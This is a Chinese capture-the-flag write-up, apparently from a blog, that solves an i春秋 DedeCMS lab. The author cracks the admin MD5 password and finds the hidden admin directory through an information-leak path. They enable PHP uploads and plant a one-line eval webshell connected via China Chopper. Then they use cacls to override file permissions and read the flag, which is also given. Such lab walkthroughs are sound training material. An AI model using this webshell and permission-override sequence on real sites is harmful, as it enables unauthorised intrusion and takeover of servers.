真的很简单

首先打开界面

发现没有提示给我们的dedeCMS工具,所以这里我们自己下载

http://file.ichunqiu.com/49ba59ab

再打开dedeCMS,粘贴上他给我们的网站

点一键爆。。。。就可以得到推荐那里显示的账号与密码,不过密码是md5加密

解密后是only_system,则only_system就是我们要找的密码,用户名就ichunqiu

再做第二题,试了试御剑,好像扫不出来,只能用搜到的方法:使用

/data/mysqli_error_trace.inc来利用后台地址信息泄露的漏洞

得到返回页,则lichunqiul为后台目录名

再第三题

我们直接http://www.test.ichunqiu/lichunqiul/进去

用户名与密码就第一题破解出来的

输入之后登录

再在系统—系统基本参数—附件设置中添加php类型的文件

这样我们就可以上传我们的一句话木马了(更改后别忘了下面点确定)

在桌面上新建一个txt然后重命名为test.php然后内容输入为我们的一句话木马

<?php @eval($_POST[‘cmd‘]); ?>

写好后在网页后台中选择核心—上传新文件就可以上传我们的一句话木马了

(选择类型为其他说明标题为test.php点浏览选择桌面上的test.php)

保存后再选择更改我们的木马就可以看见我们的木马路径了

点击查看,然后复制url路径,再使用菜刀(在桌面tools—webshell里面)

右键菜刀白板然后点新建(添加),补足信息

点添加,再双击连接就可以进入了

再依次点击c盘——文档与设置——管理者——桌面,就可以看到一个flag的txt文本

不过这里我们暂时看不了里面的内容,可能权限不够

我们直接在木马连接处右键然后点击虚拟终端进入后台cmd

输入cd C:\Documents and Settings\Administrator\桌面\进入桌面文件夹

再输入 type flag~ichunqiu.txt查看试试

返回拒绝访问,果然我们的权限不够

使用cacls命令看看权限:cacls flag~ichunqiu.txt

果然我们的NT AUTHORITY\SYSTEM栏为N,意思是none

这里我们直接更改他的设置就行了

输入cacls flag~ichunqiu.txt /E /P system:F /C就可以更改他的设置了

再次输入cacls flag~ichunqiu.txt查看权限

果然我们的NT AUTHORITY\SYSTEM栏就改为F了

我们再次输入type  flag~ichunqiu.txt进行查看

就可以看到flag了

key{il2o3l}

这里的flag是il2o3l,需要把key和{}去掉

就可以得到100分了

这里再补充一下cacls的用法

R 读取
W 写入
C 更改(写入)
F 完全控制
cacls用法可通过cmd直接查看,具体如下:
显示或者修改文件的访问控制列表(ACL)

 CACLS filename [/T] [/M] [/L] [/S[:SDDL]] [/E] [/C] [/G user:perm]
        [/R user [...]] [/P user:perm [...]] [/D user [...]]
    filename      显示 ACL。
    /T            更改当前目录及其所有子目录中
                  指定文件的 ACL。
    /L            对照目标处理符号链接本身
    /M            更改装载到目录的卷的 ACL
    /S            显示 DACL 的 SDDL 字符串。
    /S:SDDL       使用在 SDDL 字符串中指定的 ACL 替换 ACL。
                  (/E、/G、/R、/P 或 /D 无效)。
    /E            编辑 ACL 而不替换。
    /C            在出现拒绝访问错误时继续。
    /G user:perm  赋予指定用户访问权限。
                  Perm 可以是: R  读取
                               W  写入
                               C  更改(写入)
                               F  完全控制
    /R user       撤销指定用户的访问权限(仅在与 /E 一起使用时合法)。
    /P user:perm  替换指定用户的访问权限。
                  Perm 可以是: N  无
                               R  读取
                               W  写入
                               C  更改(写入)
                               F  完全控制
    /D user       拒绝指定用户的访问。
 在命令中可以使用通配符指定多个文件。
 也可以在命令中指定多个用户。

缩写:
    CI - 容器继承。
         ACE 会由目录继承。
    OI - 对象继承。
         ACE 会由文件继承。
    IO - 只继承。
         ACE 不适用于当前文件/目录。
    ID - 已继承。
         ACE 从父目录的 ACL 继承。

  

原文地址:https://www.cnblogs.com/wosun/p/11219888.html

时间: 2024-10-20 11:33:26

真的很简单的相关文章

王金战:改变一个差生真的很简单

当一个学生,反复遭遇失败的打击,他就变成了差生,没有一个学生生下来就注定是个差生.所以让一个差生变好真的很简单.    我刚参加工作的时候,不敢说这句话,但是我现在敢说,因为我多年的经历已经证明了这件事情.让一个差生变好真的很简单,怎么做呢?就是反其道而行之.差生是反复遭遇失败的打击后才产生的,让一个差生变好,就是让他反复享受到成功的喜悦,这个学生就会慢慢地变好了.    少年来我就用这样的方法和理念,帮着一个个学生走出困境,走向成功.我深深体会到,作为教师,作为家长,要学会欣赏孩子.特别是对那

怎么将pdf转换成word问题真的很简单

你还在寻找将pdf转换成word的方法吗?被网上眼花缭乱的步骤吓到了吗?你不会还在使用office word2003中的Microsoft Office Document Imaging组件来实现pdf转word工作吧.是不是太麻烦了呢?怎么将pdf转换成word问题真的很简单,不需要我们费脑筋,也不需要那么麻烦的操作,这里小编教你一个事半功倍的方法--使用迅捷pdf转换器将pdf转换成word. 经常进行文本格式转换操作的小伙伴们一定知道这款软件吧,不能再简单的操作步骤只需要三步即可完成pdf

客户端网络库实现真的很简单吗?

(注:本文所讲的网络协议只针对TCP协议) 背景:开发一个C/S的应用势必需要服务端和客户端的适配,包括网络协议.数据传输格式.业务处理的适配.由于服务端承载着大量的客户端,需要高并发.高性能.高可靠性,在我们的认知里往往认为服务端的网络模型和架构设计很复杂.但是客户端嘛,无非就是建立网络连接,发个请求收个回复如此简单.所以在工作中经常会出现有些客户端处理界面和业务的同事对平台开发者说,你做好服务端的网络就好,客户端的网络我来处理,而且在他们的想法里,这个所谓的客户端网络库只需要很短的时间就可以

HTTP真的很简单(转)

原文:HTTP Made Really Easy因为我本身网络基础就很差,所以看到这篇文章一方面是学习网络知识,另一方面为了锻炼我蹩脚的英语水平,文中如有错误,欢迎浏览指正! 前言 在看这篇文章的时候,推荐使用chrome浏览器查看http请求过程中的相关参数.chrome浏览器,可以通过‘alt+cmd+i’进入开发者模式.进入‘Network’一栏,在‘Name’栏内找到请求的网址.查看Headers一栏,就可以看到‘Response Headers’和‘Request Headers’.并

方国治:做股票真的很简单,简单到

http://blog.sina.com.cn/s/blog_5ae207160102vrlb.html 方国治:做股票真的很简单,简单到 (2015-07-11 20:00:18) 转载▼ 标签: 股票 分类: 投资大道 2015年6月13日,由七禾网和混沌天成北京营业部共同举办的“2015金融巅峰论坛暨第二期混沌天成北京沙龙”活动在北京鸿坤国际大酒店香江厅举行.由善境投资总经理吴洪涛.深圳开拓者科技有限公司副总经理陈四建.<趋势操盘法则>畅销书作者方国治,以及上海奇获投资管理有限公司投资总

其实canvas真的很简单,复杂的部分其实是你的创意

江湖上流传开来的除了牛叉的"H5",还有牛叉的canvas应用. canvas是html5的一部分,当然他们说的H5也并不是html5的意思,只是表示在手机浏览器中,更侠义的是在微信浏览器中打开的酷炫的网页. 曾几何时,我也觉得canvas真的酷爆了,各种什么烟花.酷炫的动画效果.canvas游戏等,都燃烧着我学习的热情. 后来通过学习,多看书,其实canvas并不复杂,要用到的东西也不多. 大概整理一下: 1.绘制基本几何图形 (1)直线 ctx.moveTo(100,200); c

如果你这么去理解HashMap就会发现它真的很简单

Java中的HashMap相信大家都不陌生,也是大家编程时最常用的数据结构之一,各种面试题更是恨不得掘地三尺的去问HashMap.HashTable.ConcurrentHashMap,无论面试题多么刁钻的问,只要我们真正的掌握了它的设计思想,便可以不变应万变,hold住所有的面试题了. 本文主要包含以下内容,力求深入浅出一步一步彻底明白HashMap的设计思想: 数组的优势 数组是特殊的键值对 Hash函数 Hash冲突 此时再看HashMap源码 文章干货内容较多,建议大家“收藏”后持续阅读

字符串真的很简单

字符串在C语言中没有像整型.实型.字符型那样有自己的关键字,在其它机器语言中有字符串的关键字的,所以可以说字符串是C语言引用其它语言的.为了能够让C语言也用上字符串,所以用数组来存储字符串.其定义形式一般为char  变量名[数组长度],因为ASCII码表几乎包含常用的字符,所以一般定义为字符型数组(char),可以很好的节省内存占有量.其数组长度一般要比字符串个数大一,因为合格的字符串要求最后一个字符后面有'\0'的,只有这样才能正确使用使用字符串函数strlen.strcpy等.如果字符串长

i春秋-在线挑战-真的很简单-过程记录

0x00 下载运行dedeCMS.exe意见爆帐号密码 下载并运行dedeCMS.exe获取帐号和密码. 0x01 获取hash值对应的密码 资料可知,dedeCMS的密码hash是32位的hash截取来的,因此对其前三位和最后一位进行裁剪后可得到16位的hash.破解可得密码only_system. 0x02 获取管理员后台目录 网上大量教程和经验总结获取后台的路径,但是绝大部分都是差之毫厘因此没有得到后台路径. /data/mysql_error_trace.inc是各大经验教程总结的第一方